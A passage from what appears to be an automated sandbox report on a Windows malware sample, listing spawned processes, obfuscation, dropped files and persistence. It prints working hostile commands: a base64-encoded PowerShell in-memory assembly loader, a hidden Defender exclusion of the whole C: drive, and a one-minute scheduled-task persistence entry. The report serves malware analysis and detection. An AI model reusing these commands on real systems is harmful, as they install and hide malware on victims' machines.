CnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\UndLdl.ps1' -Encoding UTF8" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\'"
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0058FA0A LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 24_2_0058FA0A
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0312B8BA push eax; ret 6_2_0312B8D9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A4305 push F693B671h; retf 8_3_032A430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A3B74 pushad ; retf 8_3_032A3B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A21AF pushad ; ret 8_3_032A21B7
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A21EF push ecx; iretd 8_3_032A21FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A45FC push esi; ret 8_3_032A4600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A4FC8 push es; ret 8_3_032A4FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A0FCE push eax; retf 8_3_032A0FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A3E4E push edi; iretd 8_3_032A3E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 8_3_032A5CD2 push dword ptr [edx+ebp+3Bh]; retf 8_3_032A5CDF
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF9D1E push esi; retf 000Ah 13_3_00007DF488BF9D1F
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF4CA0 push edx; ret 13_3_00007DF488BF4CAB
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402EE1 push 000000C3h; ret 19_2_00402FFC
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402A47 push ebx; ret 19_2_00402A53
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00401503 push edi; ret 19_2_00401530
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402A1F push ebx; ret 19_2_00402A22
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_00402A2C push ebx; ret 19_2_00402A3E
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402EE1 push 000000C3h; ret 22_2_00402FFC
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402A47 push ebx; ret 22_2_00402A53
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00401503 push edi; ret 22_2_00401530
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402A1F push ebx; ret 22_2_00402A22
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_00402A2C push ebx; ret 22_2_00402A3E
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042CC52 push dword ptr [edx+ebp+3Bh]; retf 23_3_0042CC5F
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042AAF4 pushad ; retf 23_3_0042AB03
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042B285 push F693B671h; retf 23_3_0042B28A
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042BF48 push es; ret 23_3_0042BF49
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_00427F4E push eax; retf 23_3_00427F4F
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042916F push ecx; iretd 23_3_0042917B
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042B57C push esi; ret 23_3_0042B580
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042912F pushad ; ret 23_3_00429137
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_3_0042ADCE push edi; iretd 23_3_0042ADD5
Source: 6.2.powershell.exe.8770000.2.raw.unpack, BsUHkypsWGBuvLH.cs High entropy of concatenated method names: 'VYMWBhgTmEythIb', 'vQFEBYTcUOUFqmt', 'CToEiZJxvIbZmDc', 'ZXHZYNHEBrcEYMm', 'CKKGjDRMfOHgTSo', 'YstHpSuSdigsoFj', 'BuRJqPmLcVMKoFO', 'nfjeglafPUyKaaL', 'xKOmigbKYcQiLsn', 'RfTaXnvnrfnYwaE'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, mSWuDcVRcbwpWvV.cs High entropy of concatenated method names: 'jcjKlCpOBwXPGrq', 'RwMmGIDfYzGmVIu', 'vJrHXENLOZHYroV', 'IZgCFeHzHGEefNE', 'MXowRirpirfNPNg', 'TKXVthpiwVWzvLy', 'WtVIYVpuTzxCpUu', 'xuyyzcenndCffCw', 'QbNaCDDqVRUdnRS', 'eiKIMbREAtouPwX'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, hpJnQfTykNtfLMj.cs High entropy of concatenated method names: 'GlwGibkDeZviGIo', 'oZpTGhUhgcLNFKP', 'cDDdPfqxkIlUyTu', 'xPfEUXoRLgINwQP', 'GmZLLWpuzXtXPsn', 'ENdNZVolEsQSWWO', 'JzPUSftCTSYEPVT', 'sevPjRDCDimKqjn', 'fShyZtJAlBkdkSD', 'HHNrDTcsJulhGhV'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, JniPlOumMmudvXd.cs High entropy of concatenated method names: 'ykGNfuucBQPueDF', 'mnaxHOBmErmLRXp', 'WxzjxHJFHRsbHjY', 'AASEUoMhZhXoOJK', 'ZpeyQsIDOjJJUxe', 'GSBZIiKPtSseGxr', 'OHlzcqIvowPnMcI', 'fGRJDltGVAqDlqw', 'XlGrQJVCZWqATiM', 'tOSWcEwtZnuNxzI'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ARSjvsSQqEbYieC.cs High entropy of concatenated method names: 'QYEhFvtAeUttQtz', 'TDoqQwrlzDmYggM', 'TURGUlrZAWMhOkh', 'eAsXeDnvzDlvGgx', 'dXiusMpqFeJuYYi', 'CevZaOMLolQiCBI', 'HVxZbfyyxUBCyaj', 'eDknevldZdsPZVP', 'xCczpxRLvoBTNnk', 'EQzmfqmZgRPDbcP'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, cMKsKRxcXKAbfDJ.cs High entropy of concatenated method names: 'kehJnqtIJTNNCIq', 'QcvnhEHkhwGKzIP', 'mPhdIPWYiaxDQFb', 'CpBsBBadgkjJjSe', 'CLOBXHBXDapxFeJ', 'eFUVhXuhvWkGwPk', 'kSlvvkdkwlycfLy', 'hPmAlSVBUzBksXO', 'RjHEDiqeZgrOlzZ', 'aJeIiRcnTfQmCvp'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, tMtFhWxcgNHuzQZ.cs High entropy of concatenated method names: 'vBPXGtOpcMPGhkv', 'ZAfVxprrstiDAhi', 'pnrsQEwrQRjMayL', 'BLIJXvlLxwvYXrj', 'APqAMmqAbCKxCKk', 'cXokwghWfwshLdX', 'JuphZnJSODuZoSE', 'uKeYmxrdDjAaIYc', 'PuxHJjvQfHYXxMx', 'WqHHUFdAPsMtBNa'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, cbjCBqVkWEkEoRV.cs High entropy of concatenated method names: 'GetCursorPos', 'IxmAMZjJSdYPQdO', 'nOJawHVQXOstjbM', 'NVGncQGJfrbvJhb', 'VqyZljoFpkCuEMv', 'WCwkObUqgEivAdK', 'rABMUQndGPwDnYL', 'pnjXHOaOfAjUloB', 'NYVhaJTQQwWTLRK', 'aYFHhXVndyADAhu'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, GRVRRORrwJzhHEc.cs High entropy of concatenated method names: 'OmFNlQAJAsrPczr', 'pODQLiaFjUzgYen', 'oUcyPOJcAbdjrtO', 'VsBZidvECTuKpyP', 'qBymGliSKlPTkiW', 'GEITdsMDseRFcVu', 'LuVZeKKREdoyGrk', 'sjBmTXkCrjzTfNl', 'bvYgkFwTXMRGpsb', 'ZmSvHDuzcgBwGwG'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, AEppClYhMHunVKn.cs High entropy of concatenated method names: 'oacOZqIdPfUrQAC', 'wGLsQAcEXtHCNkI', 'XWKGcoPnEgUofdT', 'FRWlIDwhClfUupF', 'ikEscbfdLwKVsBa', 'FcnJDuQBMeDwBGl', 'xlTpqhijxfIeuaB', 'HDWEgRdLPDxHoWu', 'TluMYEHptkzDaCi', 'WQmokMNcypUHtDq'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suQlIulfxLdngWM.cs High entropy of concatenated method names: 'hZvklOoAqMQhzcP', 'rvWWHUDuYztDXHO', 'HANQuBpzatiRSSL', 'cJHZxuQvoYHlBlD', 'sEMvRYKtVQauYZw', 'mXRXfCZFUezvRBA', 'RWqCeCdAttyVmnd', 'QYoUNcEOXyalicA', 'DNFkcZgSaAoptMA', 'YSZeuNfxzbCvLXu'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, hBvvnBJKIlXWBXy.cs High entropy of concatenated method names: 'lnKfXQimHspJeUf', 'pJZifmyjznrmMBI', 'VwHtWYkwmlJpRLc', 'ABwlCHZjbmrfWZf', 'hdWSkItfIUflJBS', 'MetAFOIEoWWakDM', 'xJzyHBsJwEcBnKQ', 'USpnZNalvLnyspr', 'jCvZjJLAlCnblJk', 'umLibkDSFiYdQjl'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ufngmSGDZwfHwge.cs High entropy of concatenated method names: 'fdDeGqZIZFjDDSK', 'thVGwPVCCaZdWyT', 'MdOCgvUGLNcLAkA', 'KRzHHLFGfQObtyJ', 'ZAAqsAlehvwWzsp', 'yWKVCDgpkvOviYT', 'PPeWxaLdpmwCOCD', 'ozMzfyQMbtiBqdZ', 'mBTCywqOXEDQkGj', 'oQxKGhhofcLqIrn'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ykFNpNVFSsxwfKN.cs High entropy of concatenated method names: 'NLHkQbkDziyERBE', 'uZqdXhCEMOMnbDj', 'UniIkEmAnwJmNmP', 'CNNXouJWUKUNfeK', 'vPifoaxWJgKbMYk', 'xkuxOEfAqkRXFkJ', 'VkxWjZgOJfEJOuL', 'mZCPOhajBkZOalK', 'hlpFseGyfeAxKjB', 'tmJXCnYUsgaeUIx'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, sZlykIkDrkkJaWP.cs High entropy of concatenated method names: 'UveBzrYnfyoXSaH', 'SUWizOcXYUTIPOR', 'uCOhTBNIGxkzdJB', 'JnIwUvnjFkqrxZD', 'tUxHnwrhoGBEDJc', 'TIOLqVuqmHYBJyS', 'SyPunspsSHogPYY', 'nnfaoalOLaImheH', 'iyjLUAAokxDlcxq', 'irKSsJCWKGXVpBL'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, mNVkqEoZqiXrIXE.cs High entropy of concatenated method names: 'TVaVnEGHRcwdcxs', 'ObOCwKgjJDExwAp', 'clCxwKWLLlunUrF', 'KsIKHIZVxPkbtaf', 'tsyWaBeJjwzZpbU', 'GctFVsdWAeXYDuz', 'RIpaqWfkFcFNHvx', 'nshdMOjdEdBgbpD', 'QtBzpMgeiiNxnlz', 'JGxaMHecAqTHsbM'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, GnKtotZwsUdWRRo.cs High entropy of concatenated method names: 'oWGPeZqKUeuzvyN', 'HDyChpnwWoaAtXE', 'YGfyJBvdrttVkxb', 'KGoVNKFIgTDecKf', 'hTggjmhOkRuJflR', 'KJZZljxwbsbZfJJ', 'YzaAGkjFzhwWVLf', 'SJvYTbzfCYktHHp', 'SlZsPnaxrEotpKa', 'VaDEGzTPsCOknrQ'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, xIIqIMBxriRQXnp.cs High entropy of concatenated method names: 'jhBFAxIbmcnbbft', 'KQlGMXQIeTsGbPa', 'RrLgbTVThyeyWlc', 'nQaqDrKSTKrCmtA', 'XZcvKNXfhlsAtqO', 'kjBunSZrjnnDjVQ', 'LgqKBIyzDwuIGwQ', 'ieMebHMZUIWpUYm', 'QIKJOQvcVJEUzIa', 'wdGmrNfKJWchZmk'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, LnzKEPtGGkvcIcb.cs High entropy of concatenated method names: 'qCLzRnavlbnHxuJ', 'ImEnwVcHNuGoMpI', 'lzhNJhBoDcFQmUG', 'rpHWzhBseLSVkGl', 'hgjukPIPUYXffNo', 'bCtHdmlpWVMwjnX', 'oGnJxUlYjBoWQbi', 'PMxzgFIZpDoaSQf', 'SvNrmcZRucVlgin', 'jcyzktNadCgmftw'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, KjGZUfNGuuKHwwK.cs High entropy of concatenated method names: 'eZBDKEReoCFRYcd', 'HQhKbvUAsTzaOEL', 'nmOZMDlaHNEdIHF', 'sbyypsJSCpmgUaj', 'ATwSUdeJSNbkhtU', 'lACboSjCFGDcOzM', 'jRxBcahGFBvryPX', 'DcbuWmeNXmguiPL', 'NTFvxTPEtlsuhqw', 'RlxdYMpnRsXzdgJ'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, VSncezFRucQcjPE.cs High entropy of concatenated method names: 'yPuXogeURApaHzo', 'GqovXKqfQaCALYZ', 'NkdbjNvXpAYvniR', 'kEdrJyEMQuTmaud', 'ajqWPeXoqhkbvqB', 'NdHAUkwDeyVtvEL', 'GftVUHTuWRUlJqg', 'MPFcrqAakDegTSL', 'POgJEEfgypixWuw', 'UXbgnQzKNGiGvgW'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, suSFEPEfDHGCWwn.cs High entropy of concatenated method names: 'iAVCbjGdVjtbZfz', 'KqlzulZGPhynhvh', 'wNlkZzzBFGNKcDR', 'ezOFSZybkBgzbVr', 'VTitJsWvyApDyws', 'GqrcgUZCEBtkPdV', 'sIeuMaGmXOmgxKA', 'VocUqljRIOWEdlc', 'EKOhMopDpsyjOdi', 'DiPPJMqvZnuYeYP'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, VQpdloRJILctnjH.cs High entropy of concatenated method names: 'JctTueOjaMnaANc', 'NQvffUJUJnQhjfS', 'ovREgJRPpbnLXYd', 'ZhxzSGtIjKVOnlm', 'ypVoCGNXGWQnWfe', 'hfKLLgszignRHoe', 'cWKXplcKTygRClS', 'GUhPDQHjytOKEeg', 'AJDIsLknhCvHdZR', 'IybCtEHwlVSycWF'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, bJsEsMEAYBxWKLa.cs High entropy of concatenated method names: 'FegCPTyTDXXRKsb', 'vtAjniymigdqpgU', 'XAJrhHfvqESiIVX', 'bSsBqPecsHzJgBK', 'PoiutTLUHqVbakn', 'aXbVUtPKQZbFnTs', 'dMWdxtmwgsxZtpK', 'sodhvPjJWypMyQT', 'SHWwAJvMtvCktbb', 'WhgARUNZvtgavsL'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, SYsdSZUYhJtMPsR.cs High entropy of concatenated method names: 'NsFrqywfwGuphuP', 'kmdRVvavxEGZsAS', 'MrsyfbUarsCqcxp', 'eVWmfajMCiqdtfi', 'uzLjNhTqSOZHEnZ', 'lYpxorRKSBkMnpx', 'lgNPdARHziafDxm', 'JyqpPDyXMwSimbq', 'pdqeZcoOhiNQQxM', 'BwXBHprICNTAhgH'
Source: 6.2.powershell.exe.8770000.2.raw.unpack, ZLwJbWmHOiRftRt.cs High entropy of concatenated method names: 'FWCbJglLoFAImdk', 'lNqiYzfWGGuNscw', 'SrJMyTPtYpYDGJN', 'uEnEYMUvAiAbgLf', 'kZUbvTPBkALbCHK', 'IUxQxaGFPLMlyui', 'ZZeCrqemJjdpLTa', 'wRtFlmHvCrcTtDU', 'qtfvnLvGhnhFxGf', 'PCdsAjoyPILJTyn'
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy) Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gfiecjd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\F557.exe File created: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F557.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F324.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\explorer.exe File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP2810.tmp (copy) Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gfiecjd Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe" /F

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gfiecjd:Zone.Identifier read attributes | delete
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
